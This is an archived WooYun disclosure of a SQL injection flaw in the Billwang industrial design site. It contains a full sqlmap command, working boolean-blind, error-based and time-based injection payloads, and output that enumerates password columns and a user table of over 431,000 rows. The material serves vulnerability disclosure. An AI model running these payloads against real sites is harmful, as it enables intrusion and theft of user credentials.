乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-05: 细节已通知厂商并且等待厂商处理中 2015-11-09: 厂商已经确认,细节仅向厂商公开 2015-11-19: 细节向核心白帽子及相关领域专家公开 2015-11-29: 细节向普通白帽子公开 2015-12-09: 细节向实习白帽子公开 2015-12-24: 细节向公众公开
Billwang工业设计网(http://www.Billwang.net)是以工业设计为核心的创意设计行业互联网传播平台。网站目前拥有设计师会员35万余人,设计及产品制造类企业会员千余家。会员涵盖了大陆、台湾及国外相关院校的学生、教师、知名企业管理人员和工业设计从业人员。 Billwang工业设计网成立于2000年9月。经过近11年的发展,已经从最初的“设计论坛”发展成为国内设计行业用户在线最高的互动网络媒体之一。网站已建成资讯、博闻、招聘、作品四个专业频道,为设计师、设计企业及产品制造业提供专业化的信息传播、技术交流、资源分享及人才招聘等服务。作为国内工业设计行业知名媒体传播平台,Billwang吸引了一批投身工业设计的业界精英、学者及专业的受众群体,同时也是中国工业设计协会和机械学会工业设计分会指定合作网站之一,并与国内知名设计企业和近40家高等设计类院校建立了紧密的合作关系。 我们致力打造服务于中国设计的创意设计电子商务平台,为设计院校师生、设计界从业人员和企业提供一个设计资源交流分享、设计活动信息发布推广,创意和设计成果展示、交易的互联网平台。
地址:http://**.**.**.**/?act=viewpro&do=companyjobs&userid=4059
python sqlmap.py -u "http://**.**.**.**/?act=viewpro&do=companyjobs&userid=4059" --random-agent -p userid --technique=BET --batch -D designbw -T bwduser -C username,password,qq,email --count
back-end DBMS: MySQL 5.0Database: designbw+---------+---------+| Table | Entries |+---------+---------+| bwduser | 431166 |+---------+---------+
---Parameter: userid (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: act=viewpro&do=companyjobs&userid=4059 RLIKE (SELECT (CASE WHEN (2872=2872) THEN 4059 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: act=viewpro&do=companyjobs&userid=4059 AND (SELECT 7191 FROM(SELECT COUNT(*),CONCAT(0x71707a6a71,(SELECT (ELT(7191=7191,1))),0x71786a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: act=viewpro&do=companyjobs&userid=4059 AND (SELECT * FROM (SELECT(SLEEP(5)))vLak)---web application technology: PHP 5.2.13back-end DBMS: MySQL 5.0current user: '[email protected].%'current user is DBA: Falsesqlmap resumed the following injection point(s) from stored session:---Parameter: userid (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: act=viewpro&do=companyjobs&userid=4059 RLIKE (SELECT (CASE WHEN (2872=2872) THEN 4059 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: act=viewpro&do=companyjobs&userid=4059 AND (SELECT 7191 FROM(SELECT COUNT(*),CONCAT(0x71707a6a71,(SELECT (ELT(7191=7191,1))),0x71786a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: act=viewpro&do=companyjobs&userid=4059 AND (SELECT * FROM (SELECT(SLEEP(5)))vLak)---web application technology: PHP 5.2.13back-end DBMS: MySQL 5.0database management system users [1]:[*] 'design'@'192.168.168.%'sqlmap resumed the following injection point(s) from stored session:---Parameter: userid (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: act=viewpro&do=companyjobs&userid=4059 RLIKE (SELECT (CASE WHEN (2872=2872) THEN 4059 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: act=viewpro&do=companyjobs&userid=4059 AND (SELECT 7191 FROM(SELECT COUNT(*),CONCAT(0x71707a6a71,(SELECT (ELT(7191=7191,1))),0x71786a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: act=viewpro&do=companyjobs&userid=4059 AND (SELECT * FROM (SELECT(SLEEP(5)))vLak)---web application technology: PHP 5.2.13back-end DBMS: MySQL 5.0columns LIKE 'pass' were found in the following databases:Database: designbwTable: bwduser[2 columns]+--------------+----------+| Column | Type |+--------------+----------+| password | char(32) || passworddate | date |+--------------+----------+Database: designbwTable: bwdforum[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(50) |+----------+-------------+Database: designbwTable: bwdusergroup[2 columns]+-----------------+----------------------+| Column | Type |+-----------------+----------------------+| passwordexpires | smallint(5) unsigned || passwordhistory | smallint(5) unsigned |+-----------------+----------------------+Database: designbwTable: bwdpasswordhistory[2 columns]+--------------+-------------+| Column | Type |+--------------+-------------+| password | varchar(50) || passworddate | date |+--------------+-------------+Database: designbwTable: bwdsession[1 column]+--------+------------+| Column | Type |+--------+------------+| bypass | tinyint(4) |+--------+------------+Database: wordpressTable: wp_users[1 column]+-----------+-------------+| Column | Type |+-----------+-------------+| user_pass | varchar(64) |+-----------+-------------+Database: wordpressTable: wp_posts[1 column]+---------------+-------------+| Column | Type |+---------------+-------------+| post_password | varchar(20) |+---------------+-------------+Database: new_shopTable: cdb_uc_members[1 column]+----------+----------+| Column | Type |+----------+----------+| password | char(32) |+----------+----------+Database: new_shopTable: cdb_members[1 column]+----------+----------+| Column | Type |+----------+----------+| password | char(32) |+----------+----------+Database: new_shopTable: ecs_users[3 columns]+-----------------+--------------+| Column | Type |+-----------------+--------------+| passwd_answer | varchar(255) || passwd_question | varchar(50) || password | varchar(32) |+-----------------+--------------+Database: new_shopTable: ecs_virtual_card[1 column]+---------------+-------------+| Column | Type |+---------------+-------------+| card_password | varchar(60) |+---------------+-------------+Database: new_shopTable: cdb_forumfields[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(12) |+----------+-------------+Database: new_shopTable: user[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(32) |+----------+-------------+Database: new_shopTable: uc_members[1 column]+----------+----------+| Column | Type |+----------+----------+| password | char(32) |+----------+----------+Database: new_shopTable: partner[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(32) |+----------+-------------+
Database: designbwTable: bwduser[75 columns]+------------------------------+-------------------------------------------------+| Column | Type |+------------------------------+-------------------------------------------------+| adminoptions | int(10) unsigned || aim | char(20) || autosubscribe | smallint(6) || avatarid | smallint(6) || avatarrevision | int(10) unsigned || birthday | char(10) || birthday_search | date || credit | int(10) || customtitle | smallint(6) || daysprune | smallint(6) || displaygroupid | smallint(5) unsigned || email | char(100) || emailstamp | int(10) unsigned || forum_answers | int(10) unsigned || friendcount | int(10) unsigned || friendreqcount | int(10) unsigned || gmmoderatedcount | int(10) unsigned || homepage | char(100) || icq | char(20) || infractiongroupid | smallint(5) unsigned || infractiongroupids | varchar(255) || infractions | int(10) unsigned || ipaddress | char(15) || ipoints | int(10) unsigned || joindate | int(10) unsigned || languageid | smallint(5) unsigned || lastactivity | int(10) unsigned || lastpost | int(10) unsigned || lastpostid | int(10) unsigned || lastvisit | int(10) unsigned || maxposts | smallint(6) || membergroupids | char(250) || msn | char(100) || ncode_imageresizer_maxheight | smallint(5) unsigned || ncode_imageresizer_maxwidth | smallint(5) unsigned || ncode_imageresizer_mode | enum('none','enlarge','samewindow','newwindow') || options | int(10) unsigned || parentemail | char(50) || password | char(32) || passworddate | date || pcmoderatedcount | int(10) unsigned || pcunreadcount | int(10) unsigned || pmpopup | smallint(6) || pmtotal | smallint(5) unsigned || pmunread | smallint(5) unsigned || post_thanks_thanked_posts | int(10) unsigned || post_thanks_thanked_times | int(10) unsigned || post_thanks_user_amount | int(10) unsigned || posts | int(10) unsigned || profilepicrevision | int(10) unsigned || profilevisits | int(10) unsigned || qq | char(20) || referrerid | int(10) unsigned || reputation | int(11) || reputationlevelid | int(10) unsigned || salt | char(3) || showbirthday | smallint(5) unsigned || showvbcode | smallint(5) unsigned || sigpicrevision | int(10) unsigned || skype | char(32) || socgroupinvitecount | int(10) unsigned || socgroupreqcount | int(10) unsigned || startofweek | smallint(6) || styleid | smallint(5) unsigned || threadedmode | smallint(5) unsigned || timezoneoffset | char(4) || usergroupid | smallint(5) unsigned || userid | int(10) unsigned || username | varchar(100) || usertitle | char(250) || utscore | int(11) || vmmoderatedcount | int(10) unsigned || vmunreadcount | int(10) unsigned || warnings | int(10) unsigned || yahoo | char(32) |+------------------------------+-------------------------------------------------+
点到即止,不继续深入。
增加过滤。
危害等级:中
漏洞Rank:8
确认时间:2015-11-09 11:05
暂未建立与网站管理单位的直接处置渠道,待认领。
暂无